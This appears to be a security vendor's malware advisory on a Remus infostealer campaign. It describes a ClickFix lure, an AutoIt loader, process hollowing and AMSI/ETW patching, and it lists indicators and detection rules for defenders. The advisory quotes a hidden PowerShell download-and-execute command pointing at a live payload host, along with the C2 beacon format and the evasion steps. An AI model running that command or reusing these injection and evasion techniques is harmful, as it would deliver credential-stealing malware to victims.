A new wave of the WP-002 / Remus infostealer is being delivered through a
compromised WordPress site (dorz[.]nl) that stages a ClickFix
paste-and-run lure via a BSC-testnet EtherHiding contract. The chain terminates in a
native x64 core injected fileless into a hollowed process, with a managed .NET
collection component and RSA-wrapped HTTP exfiltration.
Versus prior waves, the delivery front-end was rebuilt (IExpress-SFX + AutoIt loader
replacing the MZER/Donut branch), but the durable RSA-1024 C2 handshake key
(dc4cb858…febfac6f, e=65537) is CONFIRMED — resolved
in process memory across two independent detonations. Attribution is held at the
infrastructure level; no named-group assertion.
Corpus.a3x has been
decompiled and its obfuscation resolved (§3); the terminal native core has been recovered
from the loader itself rather than from a memory dump (§4); and every anchor has been
checked against a live 2026-09-02 detonation capture with embedded TLS secrets (§5). Five
earlier statements are corrected in §2 — including one Sigma rule that could never have
fired, and one error of our own. The lure→loader→core→C2 chain is now continuous with
no inferred links.Injected page pulls a stage from a blockchain contract. The host itself is a victim (splitcam: never blocklisted).
Contract 0xae5d8eec…08034 (selector 0xe2179b8e),
read via data-seed-prebsc-1-s1.binance.org, returns base64 JS appending the
asseload.com widget.
aps.js chain-loads a/9f2b4d03635c.js
(XOR key oipCQd0DIbeF) — fake Cloudflare verify: Win+R → Ctrl+V → OK,
poisoning the clipboard.
powershell -w h -c "iex((New-Object Net.WebClient).DownloadString('hxxp://193.221.200.66:4139/tools/soft/coms'))"
IntroductionChassis.exe drops legit AutoIt3.exe +
packed Corpus.a3x; runs AutoIt3.exe Corpus.a3x.
v15.3 VM/sandbox exit, NXDOMAIN sentinel resolver
test, AV-conditioned dwell, clean-ntdll rebuild from \KnownDlls\, AMSI + 4×ETW
export patching. Full detail in §3.
v15.3 138,055-byte embedded blob →
RC4 (PIC stub via DllCallAddress) → LZNT1
(RtlDecompressFragment) → 227,328-byte PE32+.
CORRECTED Target is a second copy of
AutoIt3.exe, falling back to System32\TapiUnattend.exe —
not a browser. CREATE_SUSPENDED + PPID-spoof under
explorer.exe; primary thread redirected with
NtSetContextThread/NtResumeThread.
Managed .NET component reads browser profile/credential stores and enumerates cryptocurrency wallet artifacts. Firefox profile access observed.
POST /invoices to 209.38.82.72:9048
(cdire[.]shop), Host: github.com spoof. Body schema rotated between
waves (access_token/debug → tag/exp/hwid).
DOWNGRADED No persistence primitive exists in the a3x. If present in this wave it belongs to the SFX or the PowerShell stage.
Five statements carried in earlier releases are contradicted by the decompiled
Corpus.a3x or by the 2026-09-02 capture. All five are corrected here and in the shipped
rulesets rather than quietly dropped — including one that was our own error. Superseded rules are
retained in downgraded form so downstream consumers can see what changed.
| v15.1 said | v15.3 finding | Impact |
|---|---|---|
| Native core is hollowed into a browser process. | The loader hollows @AutoItExe — a second copy of the AutoIt interpreter —
and falls back to %SystemRoot%\System32\TapiUnattend.exe on retry or when
bdagent.exe is present. No browser is referenced anywhere in the loader.
0x140000000 is simply the payload's own ImageBase, not a
browser-specific artefact. |
detection Hunts scoped to browser processes miss this wave entirely. |
Sigma …00004: create_remote_thread with
SourceImage = AutoIt3.exe. |
The loader never calls CreateRemoteThread. It creates the target suspended and
redirects the already-existing primary thread. Sysmon EID 8 cannot fire. |
rule was inert Replaced with EID 25 (ProcessTampering) + EID 10. |
Persistence via Task Scheduler COM / at.exe. |
No at.exe, no schtasks, no Run key, no service, no startup-folder
write, no COM task registration — the a3x contains no persistence code path at all. |
status Rule …00008 downgraded to
informational / unsupported, retained for continuity.
Source: a3x — re-confirmed by the capture, the PowerShell stager contains no
persistence either. |
Build tag is the 33-character string d355039c…c375f. |
The tag is 32 characters: 355039cceb3bd77c4ef50905dc6c375f. The leading
d was adjacent binary data picked up by a strings run over
.rdata, not part of the constant. |
our error The 33-char YARA string and STIX pattern would not have
matched the wire value. Both corrected; $tag also drops fullword,
since in .rdata the constant abuts binary data. Source: capture. |
| C2 body schema “rotated between waves”. | Two urlencoded schemas plus a multipart form — message types of one protocol, all present in a single session (§5.3). | under-match A rule requiring one schema and not the other under-matches by design. Source: capture. |
Payload host exposes /tools/soft/coms. |
Also /tools/soft/file, serving a 1.6 MB ZIP as text/plain. |
coverage Content-type/content mismatch is an independent proxy signal. Source: capture. |
ImageBase 0x140000000 and the same
entry-point RVA 0x21c0 as the v15.1 dumped image (build A), but the code differs:
build A's prologue anchor 8D 48 08 E9 does not appear at build B's entry point, which is
48 83 EC 58 B9 <imm32> E8. Build B is timestamped 2026-08-28, five days before
publication. v15.1's rule is retained, rescoped to build A and anchored at
pe.entry_point (the floating 4-byte match was FP-prone); a new rule covers build B.Corpus.a3xThe decompiled script is ~19,300 lines of machine-generated AutoIt. Four traits define the obfuscator, and they are family-level rather than campaign-level — expect them on unrelated samples using the same commodity packer:
| Trait | Detail |
|---|---|
| Control-flow flattening | Every function body is a While loop wrapping a
Switch over a state variable; each Case label is an arithmetic
expression (BitXOR(0x…, 0x…), BitShift, multi-term hex sums) and each
block ends by adding another computed constant to the state variable. |
| Single string-decode chokepoint | Every literal in the file — API names, DLL names, struct definitions, paths — is stored as a hex blob plus a short alphabetic key and routed through one decode function. That function is a repeating-key XOR over the ANSI-decoded bytes. 12,987 call sites, 2,985 distinct plaintexts. The function name is randomised per build, so it is not itself an anchor; the call shape is. |
| Junk filler | Thousands of no-op DllCalls
(GetSystemMetrics, IsProcessorFeaturePresent,
PathIsDirectoryW against random strings, CloseHandle on integer
literals) and Execute("<builtin>('<random>')") statements interleaved
with dead arithmetic on undefined variables. |
| Identifier scheme | Variables and functions are concatenated English dictionary
words ($competitorsprevvictorfleece, ADAPTERSLLOYD), regenerated per
build. Do not signature on identifier names. |
The loader branches on its environment before doing anything. Note that most branches adapt rather than abort — a sandbox that only watches for a clean exit will miss it.
| Check | Behaviour | ATT&CK |
|---|---|---|
vmtoolsd.exe · VboxTray.exe · SandboxieRpcSs.exe |
Immediate Exit. | T1497.001 |
NXDOMAIN sentinel — resolve microsoft.com (must succeed), then a fixed
nonsense FQDN built by repeating one 25-character label (must fail) |
If the sentinel resolves, the resolver is treated as a wildcard/sinkhole analysis environment and the loader aborts. | T1497.001 |
avastui.exe | Sleep ≈20 s, then TrayIconHide. | T1497.003 |
bdagent.exe | Sleep ≈160 s and switch the hollowing target to
TapiUnattend.exe. | T1497.003 · T1036.005 |
avp.exe | Drop EXTENDED_STARTUPINFO_PRESENT from the
creation flags (0x8080004 → 0x8000004), i.e. skip the PPID
spoof that Kaspersky flags. | T1518.001 |
PEB BeingDebugged; QueryPerformanceCounter/Frequency
deltas; VirtualAllocExNuma in place of VirtualAllocEx |
Emulator/hook differentiation. | T1497.001 |
BLKcXXxNNJsPfGATrtzbZZxCm is a build-time constant appearing twice in one FQDN. A DNS
query for it has no benign explanation. It is shipped as Sigma …00009 at
level: critical and as a standalone YARA rule.
Operational note for our own pipeline: if a sinkhole or wildcard resolver in the detonation
path answers this label, the loader will refuse to stage — detonate on a resolver that returns a
genuine NXDOMAIN.Before injection the loader obtains a hook-free ntdll by two independent
routes, then patches user-mode telemetry in that fresh image:
| Step | Mechanism |
|---|---|
| Clean ntdll — route 1 | NtOpenSection +
NtMapViewOfSection against \KnownDlls\ntdll.dll
(\KnownDlls32\ntdll.dll on WoW64). |
| Clean ntdll — route 2 | CreateFileA on
%SystemRoot%\System32\ntdll.dll → CreateFileMappingA with
SEC_IMAGE|PAGE_READONLY (0x1000002) → MapViewOfFile. |
| AMSI | GetModuleHandleA("amsi.dll") →
GetProcAddress("AmsiScanBuffer") → in-place prologue patch. Skipped when
amsi.dll is not loaded. |
| ETW | EtwEventWrite, EtwEventWriteFull,
EtwEventWriteEx, and on x64 EtwEventWriteTransfer — four exports
patched in the freshly mapped image. |
Consequence: user-mode ETW-sourced EDR telemetry from the loader process and its child is unreliable after this point. Kernel-sourced Sysmon events (EID 1, 10, 25) and DNS/proxy telemetry are the surviving observation surface — which is why §5's rules are built on those.
| Stage | Detail |
|---|---|
| Storage | One AutoIt string assembled from 159 hex-literal concatenations
(1,728 chars each) — 138,055 bytes, SHA-256
5f21239e…8b4108. No FileInstall, no dropped intermediate file. |
| Layer 1 — RC4 | Key is a 35-digit ASCII numeric literal
(57289866…480987) passed through Binary(). The cipher itself is not
written in AutoIt: KSA and PRGA ship as position-independent x86 and x64 stubs stored as
hex literals and invoked through DllCallAddress after
VirtualAlloc/VirtualProtect. Branch selected on
@AutoItX64. |
| Layer 2 — LZNT1 | RtlGetCompressionWorkSpaceSize +
RtlDecompressFragment with COMPRESSION_FORMAT_LZNT1 (format 2). |
| Result | 227,328-byte PE32+ — see §4. |
| Step | Detail |
|---|---|
| Target selection | @AutoItExe by default; on retry (or with
bdagent.exe present) %SystemRoot%\System32\TapiUnattend.exe. The
routine retries in a loop, calling ProcessClose on the target's basename between
attempts. |
| Child creation | CreateProcessW(NULL, "<target> <token>", …,
dwCreationFlags = 0x8080004) =
CREATE_SUSPENDED | CREATE_NO_WINDOW | EXTENDED_STARTUPINFO_PRESENT. The
<token> argument is derived from the loader's own @AutoItPID and
acts as a handshake for the injected image. |
| PPID spoof | Only when not elevated: OpenProcess(MAXIMUM_ALLOWED)
on explorer.exe →
UpdateProcThreadAttribute(PROC_THREAD_ATTRIBUTE_PARENT_PROCESS). The child
therefore reports Explorer as its parent. |
| Mapping | NtUnmapViewOfSection → VirtualAllocExNuma at the
preferred base 0x140000000 → per-section NtWriteVirtualMemory →
relocation processing → NtProtectVirtualMemory. |
| Hand-off | NtSetContextThread on the suspended primary thread, then
NtResumeThread. No CreateRemoteThread, no
QueueUserAPC. |
| WoW64 | IsWow64Process, NtWow64QueryInformationProcess64,
NtWow64ReadVirtualMemory64 — a 32-bit interpreter can inject into a 64-bit target.
Both x86 and x64 CONTEXT and PEB layouts are carried. |
The image was recovered statically by unwrapping the a3x blob, so this is a pre-execution artefact, not a memory dump. Its capability profile matches the v15.1 dumped image; its bytes do not.
| Property | Value |
|---|---|
| Format | PE32+ x64, GUI subsystem, 4 sections, 227,328 bytes |
| SHA-256 | 6e3e5e0d169a79e148f0e73bfee7cad84370069ca9fbedd69e506ffb7780fce9 |
| MD5 | 3624cb665a45bdea14b3e5065121ab1b |
| imphash | 754318d99f6bf9d00342a1a491eb8242 |
| ImageBase / EP RVA | 0x140000000 / 0x21c0 |
| Compile timestamp | 2026-08-28 11:51:22 UTC |
.text SHA-256 | 11e2d6f7272175f6f2c4ed794c0d94c39b8b8a1ffe180bf3b1dedaa71584ff94 |
.rdata SHA-256 / entropy | 0231035731ceeb06826b433bbebeb2967f1289b1e9a5e51a511b9072bf04ed45 · 7.37 (sealed config) |
Build markers in .rdata | 355039cceb3bd77c4ef50905dc6c375f (32-char lowercase hex, build/campaign tag — sent verbatim as the C2 tag= field) and 28.08.2026 (build date, matching the PE timestamp) |
| Managed code | None — CLR directory empty. This stage is fully native. |
The import surface is consistent with the v15.1 profile — 36 imports across
KERNEL32 · ole32 · USER32 · ADVAPI32 · GDI32 · OLEAUT32: screen capture
(BitBlt, GetDIBits, CreateCompatibleDC/Bitmap,
GetWindowDC), hidden-desktop interaction (CreateDesktopW,
OpenDesktopW, CloseDesktop, EnumDisplaySettingsW), COM/BSTR
handling, host fingerprinting (GetComputerNameA/ExA, GetUserNameA,
GetKeyboardLayout, GetKeyboardLayoutNameA/W), privilege lookup and
clipboard/global-memory handling.
.rdata, the
network layer and the target lists are resolved at runtime, which is the same runtime-keyed sealing
first documented in v14.x. Static recovery of the C2 from this artefact is not expected and was
not achieved. However — see §5 — the 32-character build tag in this image's .rdata is
transmitted verbatim as the tag= field of the C2 registration beacon. The
cdire[.]shop attribution is therefore no longer capture-only inference: this file and
that C2 session are linked by a shared constant.Capture: 23,343 frames over 186 s, victim 10.127.0.26, resolver 8.8.8.8,
TLS secrets embedded as a DSB block (17,119 bytes of keylog). Timings below are relative to the first
frame.
| t (s) | Event | Status |
|---|---|---|
| 5.2 | dorz[.]nl → 209.42.255.100; WordPress/Elementor page loads (hello-elementor theme, elementor-pro) | confirms v15.1 |
| 8.7–8.9 | BSC-testnet RPC: eth_chainId → 0x61 (testnet 97), eth_blockNumber, then eth_call to 0xae5d8eec6ea8366e7922c93abc908ff96eb08034 with data: 0xe2179b8e | exact match |
| 9.6 | asseload[.]com → 104.21.59.52, 172.67.214.143; TLS connection carries SNI cloudflare-ech.com | new — ECH |
| 82.7 | GET 193.221.200.66:4139/tools/soft/coms → 243 B text/plain | confirms v15.1 |
| 82.8 | GET 193.221.200.66:4139/tools/soft/file → 1,621,425 B, served text/plain, actually a ZIP | new URI |
| 86.63 | Sentinel query BLKcXXxNNJsPfGATrtzbZZxCm.BLKcXXxNNJsPfGATrtzbZZxCm → rcode 3 (NXDOMAIN) | VERIFIED |
| 86.66 | microsoft.com → NOERROR, 150.171.109.36 | VERIFIED |
| 101.8 | cdire[.]shop → 209.38.82.72 | confirms v15.1 |
| 102.2 | First POST /invoices — the registration beacon | confirms v15.1 |
| 166.1 | Single multipart/form-data upload of 2,125,839 bytes | new |
microsoft.com — the reverse of the order the two calls appear in the source. Do not build
a sequence rule that assumes source order./tools/soft/coms (SHA-256 64aa3e37…7426) is six lines of PowerShell. It
supplies the host artefacts every prior version of this advisory was missing:
%APPDATA%\c.zip <-- downloaded from /tools/soft/file %APPDATA%\c\ <-- Expand-Archive -Force destination, archive then deleted %APPDATA%\c\IntroductionChassis.exe <-- Start-Process target
The archive (SHA-256 97860fba…45b5) contains exactly one file:
IntroductionChassis.exe, SHA-256 2a1d78fb…9787680 — byte-identical to the
SFX hash carried since v15.1. The delivery chain is now continuous from lure to loader with no
inferred links.
v15.1 described the body schemas as rotating between waves. They do not rotate: they are message types of a single protocol, and all of them appear inside this one 90-second session.
| Message | Body | Count | Purpose |
|---|---|---|---|
| Registration | tag=355039cc…c375f · exp=1787902294 · hwid=32 hex | 1 | Check-in. tag is the build constant from the core's .rdata; exp is a fixed epoch (2026-08-28 07:31:34 UTC, ~4.3 h before the PE compile timestamp) — not an expiry relative to run time. |
| Step marker | access_token=GUID · step=1…7 | 7 | Sequential progress markers. |
| Status | access_token=GUID · debug=hex blob | 69 | Opaque, ~30–90 B. |
| Bulk upload | multipart/form-data: parts access_token, type (0/1/2), file with filename="data", application/octet-stream | 6 | Encrypted collected data; boundary is random alphanumerics of varying length (8–15 observed). Largest: 2,125,839 B. |
Session token for this run: 794698e3-63ed-487d-b7c4-c265b706737d (per-run, not durable).
Request header order is Cache-Control · Connection · Pragma · Content-Type · Host · User-Agent ·
Content-Length — Host in fifth position, which no mainstream browser or WinHTTP
default produces.
HTTP/1.1 405 Method Not Allowed, Server: nginx — 74 of them the stock
150-byte nginx error page — and the client kept uploading regardless, including the 2.1 MB body. A
host streaming megabytes into an endpoint that rejects the method every single time is a strong
standalone heuristic that survives rotation of the URI, the spoofed Host and the destination. Shipped
as Sigma …00015.asseload[.]com — read before acting.
The stager is reached over Encrypted Client Hello: the TLS handshake carries SNI
cloudflare-ech.com, not the real name. SNI-based inspection and blocking will not see it.
Its A records (104.21.59.52, 172.67.214.143) are shared Cloudflare
addresses — blocking them by IP would take down unrelated sites. Enforce by DNS name / RPZ
only. The same caution applies to any Cloudflare-fronted indicator in this advisory.dc4cb858…febfac6f, e=65537) resolved in the
PowerShell stage memory across two independent detonations. v15.3 confirms it is
absent from the a3x by construction — the loader contains no key material at all, which is
why on-disk and wire hunts came up empty.cdire[.]shop →
209.38.82.72:9048, resolved directly from the packet capture. Same
/invoices, same github.com host-spoof. v15.3: now corroborated —
the registration beacon carries the build tag found in the recovered core's .rdata.4cea7ae8… matches neither prior WP-002 anchor. Delivery was rebuilt while the
terminal family and C2 key held.OLEAUT32 BSTR
allocate→use→free cycle, so it never exists as a durable contiguous string. Bounded to the import
surface and host telemetry.| Type | Value | Role | Handling |
|---|---|---|---|
| domain | BLKcXXxNNJsPfGATrtzbZZxCm[.]BLKcXXxNNJsPfGATrtzbZZxCm | v15.3 NXDOMAIN sentinel — loader-side resolver test | DETECT ONLY — do not sinkhole, do not resolve |
| domain | cdire[.]shop | Remus C2 (new) | block |
| ipv4 | 209.38.82.72:9048 | Remus C2 (2 waves) | block |
| domain | asseload[.]com | ClickFix stager | block |
| ipv4 | 193.221.200.66:4139 | PS dropper + ZIP host | block |
| eth | 0xae5d8eec…08034 | EtherHiding contract | track |
| url | hxxp://dorz[.]nl/ | Compromised lure | VICTIM — notify, do not block |
| Type | Value | Note |
|---|---|---|
| sha256 | 2a1d78fb…9787680 | IntroductionChassis.exe (IExpress SFX) |
| sha256 | 74a517b6…7a4a67f | Corpus.a3x (compiled AutoIt, packed) |
| sha256 | 92c6531a…733f9f45 | AutoIt3.exe (legit interpreter, abused LOLBin) |
| sha256 | 97860fba…45b5 | v15.3 Stager ZIP from /tools/soft/file (1,621,425 B, served as text/plain) |
| sha256 | 64aa3e37…7426 | v15.3 PowerShell body from /tools/soft/coms (243 B) |
| path | %APPDATA%\c.zip · %APPDATA%\c\IntroductionChassis.exe | v15.3 Stager drop paths (names may rotate) |
| uri | /tools/soft/file | v15.3 Second URI on the payload host |
| sha256 | 5f21239e…8b4108 | v15.3 RC4-wrapped blob as embedded in the a3x (138,055 B) |
| sha256 | 6e3e5e0d…780fce9 | v15.3 Native core build B, unwrapped (227,328 B) |
| sha256 (.text) | 11e2d6f7…584ff94 | v15.3 Build B .text — use once manually mapped |
| imphash | 754318d9…1eb8242 | v15.3 Build B |
| sha256 (.text) | eba3f014…4c138 | Native core build A (v15.1 dump) — distinct build, retain separately |
| string | 355039cceb3bd77c4ef50905dc6c375f | CORRECTED Build/campaign tag in core .rdata and the C2 tag= value — 32 chars, not 33 |
| string | 57289866169362989668663919390480987 | v15.3 RC4 stage key; source/script-memory anchor only |
| path | %SystemRoot%\System32\TapiUnattend.exe | v15.3 Fallback hollowing target (legitimate binary — detect execution, do not remove) |
| modulus | dc4cb858…febfac6f | Durable RSA-1024 C2 key (e=65537), runtime-resolved |
Full rulesets ship alongside this advisory: YARA
(SL-ADV-2026-WP-001-V15.3.yar, 15 rules), Sigma
(SL-ADV-2026-WP-001-V15.3_sigma.yml, 15 rules), and a STIX 2.1 bundle
(SL-ADV-2026-WP-001-V15.3_stix.json, 89 objects with kill-chain relationships).
Host — a DNS query for the sentinel label. There is no benign explanation; it is a build-time constant and it appears twice in the same FQDN:
QueryName: BLKcXXxNNJsPfGATrtzbZZxCm.BLKcXXxNNJsPfGATrtzbZZxCm
^-- fixed 25-char label, repeated. Loader ABORTS if this resolves.
Sigma ...00009 (critical) · YARA WP002_AutoIt_loader_nxdomain_sentinel
Host — execution of a binary that essentially never runs, or an interpreter parenting itself with a bare token:
Image : C:\Windows\System32\TapiUnattend.exe (takes no arguments; any execution is signal) ParentImage: ...\AutoIt3.exe (or explorer.exe, if the PPID spoof landed) ParentImage: ...\AutoIt3.exe Image : ...\AutoIt3.exe CommandLine: "...\AutoIt3.exe" <token> (no .au3/.a3x path -> not a normal relaunch)
Network — the exfil beacon spoofs Host: github.com while connecting to a
non-GitHub IP:
POST /invoices HTTP/1.1 Host: github.com <-- spoofed; destination is 209.38.82.72 / cdire.shop User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) ... Chrome/117.0.0.0 Content-Type: application/x-www-form-urlencoded tag=<hex>&exp=<epoch>&hwid=<hex> (variant-2; variant-1 = access_token=<guid>&debug=<hex>)
ntdll, user-mode ETW-derived EDR events from the loader and
its child are unreliable. Rules …00009–…00012 deliberately sit on DNS,
Sysmon EID 1/10/25 and proxy telemetry for that reason. Absence of EDR alerts is not absence of
compromise here.| Priority | Action |
|---|---|
| now | Deploy Sigma …00009 (sentinel DNS) — single highest-confidence indicator in this release; retro-hunt 90 days of DNS logs. |
| now | Block C2 209.38.82.72, cdire[.]shop, stager asseload[.]com, payload host 193.221.200.66. |
| now | Alert on POST /invoices + spoofed Host: github.com to non-GitHub destinations. |
| now | Replace any v15.1 detection scoped to browser-process hollowing or to CreateRemoteThread from AutoIt3.exe — both are inert against this wave (§2). |
| soon | Alert on any execution of TapiUnattend.exe, and on AutoIt3.exe parenting AutoIt3.exe with a bare token argument. |
| soon | Enable Sysmon EID 25 (ProcessTampering) and EID 10 if not already collected; they are the surviving hollowing telemetry once ETW is patched. |
| soon | Hunt powershell -w h … DownloadString cradles; memory-scan suspect hosts for the build tag 355039cc…c375f. |
| coord | Notify dorz[.]nl host/registrar (.nl abuse) — victim cleanup, not blocklisting. |
| lab | Detonate on a resolver returning genuine NXDOMAIN — a wildcard or sinkholing resolver will cause the loader to abort before staging. |
Attribution stance: infrastructure-level only; no named-group or nation-state assertion.
Splitcam rule: compromised lure/victim hosts are never added to blocklists.
Provenance: §3 and §4 are derived from static analysis of the decompiled
Corpus.a3x and from the core recovered out of it. Network indicators remain
capture-sourced and are explicitly not corroborated by those artefacts. The runtime-keyed
target-list sealing and the OLEAUT capability profile are re-confirmations of findings first
established in v14.x. All five corrections are collected in §2, one of which is an error of our
own, corrected here rather than quietly amended. Superseded rules are retained in downgraded form
rather than deleted, so downstream consumers can see what changed. This document consolidates and
supersedes v15.1 and v15.2; no indicator or rule from either has been dropped.
SL-ADV-2026-WP-001 v15.3 · TLP:CLEAR · Dispensight / SecureLeaf · secureleaf.dispensight.com